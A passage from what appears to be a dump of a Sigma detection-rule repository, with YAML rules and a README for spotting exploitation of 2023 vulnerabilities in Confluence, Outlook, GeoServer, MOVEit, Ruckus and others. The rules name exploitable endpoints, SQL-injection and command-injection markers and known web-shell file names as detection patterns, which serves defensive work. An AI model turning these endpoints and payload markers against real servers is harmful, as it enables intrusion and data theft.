filter_main_ulimit:\n        CommandLine|contains: 'ulimit -u'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)\nid: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db\nrelated:\n    - id: f8987c03-4290-4c96-870f-55e75ee377f4\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\tomcat8.exe'\n            - '\\tomcat9.exe'\n            - '\\tomcat10.exe'\n        ParentCommandLine|contains: 'confluence'\n    selection_child:\n        # Note: Only children associated with known campaigns\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/proxy_exploit_cve_2023_22518_confluence_auth_bypass.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)\nid: 27d2cdde-9778-490e-91ec-9bd0be6e8cc6\nrelated:\n    - id: a902d249-9b9c-4dc4-8fd0-fbe528ef965c\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection_method:\n        cs-method: 'POST'\n    selection_uris:\n        cs-uri|contains:\n          # Exploitable endpoints\n            - '/json/setup-restore-local.action'\n            - '/json/setup-restore-progress.action'\n            - '/json/setup-restore.action'\n            - '/server-info.action'\n            - '/setup/setupadministrator.action'\n    selection_status:\n        # Response code may be indicative of exploitation success, but is not always the case\n        sc-status:\n            - 200\n            - 302\n            - 405\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-22518/web_exploit_cve_2023_22518_confluence_auth_bypass.yml",
    "content": "title: CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)\nid: a902d249-9b9c-4dc4-8fd0-fbe528ef965c\nrelated:\n    - id: 27d2cdde-9778-490e-91ec-9bd0be6e8cc6\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.\nreferences:\n    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html\n    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment\n    - https://github.com/ForceFledgling/CVE-2023-22518\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-11-14\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-22518\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_method:\n        cs-method: 'POST'\n    selection_uris:\n        cs-uri-query|contains:\n          # Exploitable endpoints\n            - '/json/setup-restore-local.action'\n            - '/json/setup-restore-progress.action'\n            - '/json/setup-restore.action'\n            - '/server-info.action'\n            - '/setup/setupadministrator.action'\n    selection_status:\n        # Response code may be indicative of exploitation success, but is not always the case\n        sc-status:\n            - 200\n            - 302\n            - 405\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-2283/lnx_sshd_exploit_cve_2023_2283_libssh_authentication_bypass.yml",
    "content": "title: Potential CVE-2023-2283 Exploitation\nid: 8b244735-5833-4517-a45b-28d8c63924c0\nstatus: test\ndescription: Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.\nreferences:\n    - https://twitter.com/kevin_backhouse/status/1666459308941357056?s=20\n    - https://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-2283\n    - https://www.blumira.com/cve-2023-2283/\n    - https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-2283\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    service: sshd\ndetection:\n    keywords:\n        - 'Failed to generate curve25519 keys'\n    condition: keywords\nfalsepositives:\n    - Errors with the initialization or generation of the X25519 elliptic curve keys may generate the same error message\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml",
    "content": "title: Outlook Task/Note Reminder Received\nid: fc06e655-d98c-412f-ac76-05c2698b1cb2\nstatus: test\ndescription: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-05\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\n    - cve.2023-23397\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Office\\'\n            - '\\Outlook\\'\n        TargetObject|contains:\n            - '\\Tasks\\'\n            - '\\Notes\\'\n    condition: selection\nfalsepositives:\n    - Legitimate reminders received for a task or a note will also trigger this rule.\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml",
    "content": "title: CVE-2023-23397 Exploitation Attempt\nid: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c\nstatus: test\ndescription: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.\nauthor: Robert Lee @quantum_cookie\ndate: 2023-03-16\nmodified: 2023-03-22\nreferences:\n    - https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/\ntags:\n    - attack.credential-access\n    - attack.initial-access\n    - cve.2023-23397\n    - detection.emerging-threats\nlogsource:\n    service: security\n    product: windows\n    definition: 'Requirements: SACLs must be enabled for \"Query Value\" on the registry keys used in this rule'\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ProcessName|endswith: '\\OUTLOOK.EXE'\n        # Example: \\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\WebClient\\NetworkProvider\n        ObjectName|contains|all:\n            - '\\REGISTRY\\MACHINE\\SYSTEM'\n            - 'Services\\'\n        ObjectName|endswith:\n            - 'WebClient\\NetworkProvider'\n            - 'LanmanWorkstation\\NetworkProvider'\n        AccessList|contains: '%%4416' # \"Query key value\"\n    condition: selection\nfalsepositives:\n    - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml",
    "content": "title: Potential CVE-2023-23397 Exploitation Attempt - SMB\nid: de96b824-02b0-4241-9356-7e9b47f04bac\nstatus: test\ndescription: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\n    - https://github.com/nasbench/Misc-Research/blob/fc46f6da34ff7e0076da28fd3e66d6e1100f1c2f/ETW/Microsoft-Windows-SMBClient.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-05\nmodified: 2025-10-13\ntags:\n    - attack.exfiltration\n    - cve.2023-23397\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: smbclient-connectivity\ndetection:\n    selection:\n        # Author Note: You could adapt this rule to use the \"ServerName\" field and uncomment the commented EventIDs. But you need to provide your own filter for \"trusted server names\"\n        EventID:\n            # - 30800 # The server name cannot be resolved. (Doesn't contain the \"ServerAddress\" field)\n            - 30803 # Failed to establish a network connection.\n            - 30804 # A network connection was disconnected.\n            - 30806 # The client re-established its session to the server.\n            # - 31001 # Error (Doesn't contain the \"ServerAddress\" field)\n    filter_main_local_ips:\n        - ServerAddress|cidr:\n              # IPv4\n              - '10.0.0.0/8'\n              - '127.0.0.0/8'\n              - '169.254.0.0/16'\n              - '172.16.0.0/12'\n              - '192.168.0.0/16'\n              # IPv6\n              - '::1/128'  # IPv6 loopback\n              - 'fe80::/10'  # IPv6 link-local addresses\n              - 'fc00::/7'  # IPv6 private addresses\n        - Address|startswith:\n        # This is for EventID 30804, which doesn't have the \"ServerAddress\" field, but a field called \"Address\" and it contains a socket address (IP:Port) and not an IP\n              # IPv4\n              - '10.'\n              - '127.'\n              - '169.254.'\n              - '172.'\n              - '192.168.'\n              # IPv6\n              - '::1'\n              - 'fe80::'\n              - 'fc00::'\n        # The filters below cover the XML raw log\n        - Address|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              - '0200????C0A8' # 192.168.\n              - '0200????AC' # 172.\n              - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n        - ServerAddress|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              - '0200????C0A8' # 192.168.\n              - '0200????AC' # 172.\n              - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n        - RemoteAddress|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 private addresses\n              # IPv4\n              # The \"?\" are meant to represent the port\n              - '0200????C0A8' # 192.168.\n              - '0200????AC' # 172.\n              - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives may occur from external trusted servers. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-23752/web_cve_2023_23752_joomla_exploit_attempt.yml",
    "content": "title: Potential CVE-2023-23752 Exploitation Attempt\nid: 0e1ebc5a-15d0-4bf6-8199-b2535397433a\nstatus: test\ndescription: Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla\nreferences:\n    - https://xz.aliyun.com/t/12175\n    - https://twitter.com/momika233/status/1626464189261942786\nauthor: Bhabesh Raj\ndate: 2023-02-23\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-23752\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/api/index.php/v1/'\n            - 'public=true'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-25157/web_cve_2023_25157_geoserver_sql_injection.yml",
    "content": "title: Potential CVE-2023-25157 Exploitation Attempt\nid: c0341543-5ed0-4475-aabc-7eea8c52aa66\nstatus: test\ndescription: Detects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer\nreferences:\n    - https://github.com/win3zz/CVE-2023-25157\n    - https://twitter.com/parzel2/status/1665726454489915395\n    - https://github.com/advisories/GHSA-7g5f-wrx8-5ccf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.initial-access\n    - cve.2023-25157\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_url:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/geoserver/ows'\n            - 'CQL_FILTER='\n        cs-uri-query|contains:\n            # Abusable Filters/Function as reported in the Advisory\n            - 'PropertyIsLike'\n            - 'strEndsWith'\n            - 'strStartsWith'\n            - 'FeatureId'\n            - 'jsonArrayContains'\n            - 'DWithin'\n    selection_payload:\n        cs-uri-query|contains:\n            - '+--'\n            - '+AS+'\n            - '+OR+'\n            - 'FROM'\n            - 'ORDER+BY'\n            - 'SELECT'\n            - 'sleep%28'\n            - 'substring%28'\n            - 'UNION'\n            - 'WHERE'\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-25717/web_cve_2023_25717_ruckus_wireless_admin_exploit_attempt.yml",
    "content": "title: Potential CVE-2023-25717 Exploitation Attempt\nid: 043c1609-0e32-4462-a6f2-5a0c2da3fafe\nstatus: test\ndescription: Detects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin\nreferences:\n    - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-30\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-25717\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/forms/doLogin'\n            - 'login_username'\n            - 'password'\n        cs-uri-query|contains:\n            - '$('\n            - '%24%28' # URL Encode version of \"$(\"\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\n    - Some rare false positives may occur if the password contains the characters \"$(\". Apply addition indicators such as executed commands to remove FP\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml",
    "content": "title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader\nid: 9cae055f-e1d2-4f81-b8a5-1986a68cdd84\nstatus: test\ndescription: Detects suspicious \".hta\" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.\nreferences:\n    - https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363\n    - https://www.zerodayinitiative.com/advisories/ZDI-23-491/\n    - https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/\nauthor: Gregory\ndate: 2023-10-11\ntags:\n    - attack.persistence\n    - attack.t1505.001\n    - cve.2023-27363\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\FoxitPDFReader.exe'\n        TargetFilename|contains: '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n        TargetFilename|endswith: '.hta'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-27997/web_cve_2023_27997_pre_authentication_rce.yml",
    "content": "title: Potential CVE-2023-27997 Exploitation Indicators\nid: 31e4e649-7394-4fd2-9ae7-dbc61eebb550\nstatus: test\ndescription: |\n    Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs.\n    To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the \"enc\" parameter\nreferences:\n    - https://blog.lexfo.fr/Forensics-xortigate-notice.html\n    - https://blog.lexfo.fr/xortigate-cve-2023-27997.html\n    - https://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/\n    - https://labs.watchtowr.com/xortigate-or-cve-2023-27997/\nauthor: Sergio Palacios Dominguez, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-27997\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_uri:\n        cs-method:\n            - 'GET'\n            - 'POST'\n        cs-uri-query|contains:\n            - '/remote/hostcheck_validate'\n            - '/remote/logincheck'\n    selection_keywords:\n        - 'enc='\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/README.md",
    "content": "# MOVEit Transfer Critical Vulnerability (May 2023)\n\n## Summary\n\nProgress has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment.\n\nYou can find more information on the threat in the following articles:\n\n- [New MOVEit Transfer zero-day mass-exploited in data theft attacks](https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/)\n- [MOVEit Transfer Critical Vulnerability (May 2023)](https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023)\n- [Rapid7 Observed Exploitation of Critical MOVEit Transfer Vulnerability](https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/)\n- [CRITICAL VULNERABILITY IN PROGRESS MOVEIT TRANSFER: TECHNICAL ANALYSIS AND RECOMMENDATIONS - TrustedSec](https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/)\n- [MOVEit Transfer Critical Vulnerability Rapid Response - Huntress](https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response)\n\n## Rules\n\n- [Potential MOVEit Transfer CVE-2023-34362 Exploitation](./file_event_win_exploit_cve_2023_34362_moveit_transfer.yml)\n- [MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request](web_cve_2023_34362_known_payload_request.yml.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml",
    "content": "title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity\nid: c3b2a774-3152-4989-83c1-7afc48fd1599\nstatus: test\ndescription: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/\n    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023\n    - https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/\n    - https://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\nmodified: 2024-08-13\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-34362\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        TargetFilename|contains:\n            - '\\MOVEit Transfer\\wwwroot\\'\n            - '\\MOVEitTransfer\\wwwroot\\'\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.ps1'\n            - '.rar'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    selection_known_ioc:\n        TargetFilename|endswith:\n            - '\\MOVEit Transfer\\wwwroot\\_human2.aspx.lnk'\n            - '\\MOVEit Transfer\\wwwroot\\_human2.aspx'\n            - '\\MOVEit Transfer\\wwwroot\\human2.aspx.lnk'\n            - '\\MOVEit Transfer\\wwwroot\\human2.aspx'\n            - '\\MOVEitTransfer\\wwwroot\\_human2.aspx.lnk'\n            - '\\MOVEitTransfer\\wwwroot\\_human2.aspx'\n            - '\\MOVEitTransfer\\wwwroot\\human2.aspx.lnk'\n            - '\\MOVEitTransfer\\wwwroot\\human2.aspx'\n    # Uncomment selection if you wanna threat hunt for additional artifacts\n    # selection_cmdline:\n    #    TargetFilename|contains: ':\\Windows\\TEMP\\'\n    #    TargetFilename|endswith: '.cmdline'\n    selection_compiled_asp:\n        CreationUtcTime|startswith:\n            - '2023-03- '\n            - '2023-04- '\n            - '2023-05- '\n            - '2023-06- '\n        TargetFilename|contains|all:\n            - '\\Windows\\Microsoft.net\\Framework64\\v'\n            - '\\Temporary ASP.NET Files\\'\n            - 'App_Web_'\n        TargetFilename|endswith: '.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - To avoid FP, this rule should only be applied on MOVEit servers.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/proc_creation_win_exploit_cve_2023_34362_moveit_transfer_exploitation_activity.yml",
    "content": "title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE\nid: 39ac1fb0-07f1-474b-b97e-c5c0eace0d79\nstatus: test\ndescription: |\n    Detects the execution of \"csc.exe\" via \"w3wp.exe\" process. MOVEit affected hosts execute \"csc.exe\" via the \"w3wp.exe\" process to dynamically compile malicious DLL files.\n\n    MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\\\Windows\\\\Microsoft\\.NET\\\\Framework64\\\\v4\\.0\\.30319\\\\Temporary ASP\\.NET Files\\\\root\\\\([a-z0-9]{5,12})\\\\([a-z0-9]{5,12})\\\\App_Web_[a-z0-9]{5,12}\\.dll.\n\n    Hunting Opportunity\n\n    Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.\nreferences:\n    - https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response\n    - https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/\nauthor: '@kostastsale'\ndate: 2023-06-01\ntags:\n    - attack.execution\n    - attack.t1059\n    - cve.2023-34362\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\w3wp.exe'\n        ParentCommandLine|contains: 'moveitdmz pool'\n        Image|endswith: '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - Initial software installation and software updates.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/web_cve_2023_34362_known_payload_request.yml.yml",
    "content": "title: MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request\nid: 435e41f2-48eb-4c95-8a2b-ed24b50ec30b\nstatus: test\ndescription: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362\nreferences:\n    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023\n    - https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-03\nmodified: 2023-07-28\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - cve.2023-34362\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem|contains:\n            - '/human2.aspx'\n            - '/_human2.aspx'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml",
    "content": "title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location\nid: 92389a99-5215-43b0-a09f-e334453b2ed3\nstatus: test\ndescription: Detects the creation of a \"Report.wer\" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.\nreferences:\n    - https://github.com/Wh04m1001/CVE-2023-36874\n    - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-23\ntags:\n    - attack.execution\n    - cve.2023-36874\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: ':\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\'\n        TargetFilename|endswith: '\\Report.wer'\n    filter_main_locations:\n        TargetFilename|contains:\n            # Note: This list is non exhaustive. Use this as a start for hunting for suspicious folder report\n            - '\\ReportArchive\\AppCrash_'\n            - '\\ReportArchive\\AppHang_'\n            - '\\ReportArchive\\Critical_'\n            - '\\ReportArchive\\Kernel_'\n            - '\\ReportArchive\\NonCritical_'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml",
    "content": "title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation\nid: ad0960eb-0015-4d16-be13-b3d9f18f1342\nstatus: test\ndescription: Detects the creation of a file named \"wermgr.exe\" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.\nreferences:\n    - https://github.com/Wh04m1001/CVE-2023-36874\n    - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-23\nmodified: 2025-01-13\ntags:\n    - attack.execution\n    - cve.2023-36874\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\wermgr.exe'\n    filter_main_locations:\n        TargetFilename|contains:\n            - ':\\$WINDOWS.~BT\\NewOS\\'\n            - ':\\$WinREAgent\\' # From \"wuauclt.exe\"\n            - ':\\Windows\\servicing\\LCU\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n            - ':\\WUDownloadCache\\' # Windows Update Download Cache\n            - ':\\Windows\\SoftwareDistribution\\Download\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml",
    "content": "title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution\nid: 50dbc08b-60ce-40f1-a6b6-346497e34c88\nstatus: test\ndescription: Detects the execution of a renamed \"cmd\", \"powershell\" or \"powershell_ise\" binary. Attackers were seen using these binaries in a renamed form as \"wermgr.exe\" in exploitation of CVE-2023-36874\nreferences:\n    - https://github.com/Wh04m1001/CVE-2023-36874\n    - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-23\ntags:\n    - attack.execution\n    - cve.2023-36874\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'Cmd.Exe'\n            - 'powershell_ise.EXE'\n            - 'powershell.exe'\n        Image|endswith: '\\wermgr.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml",
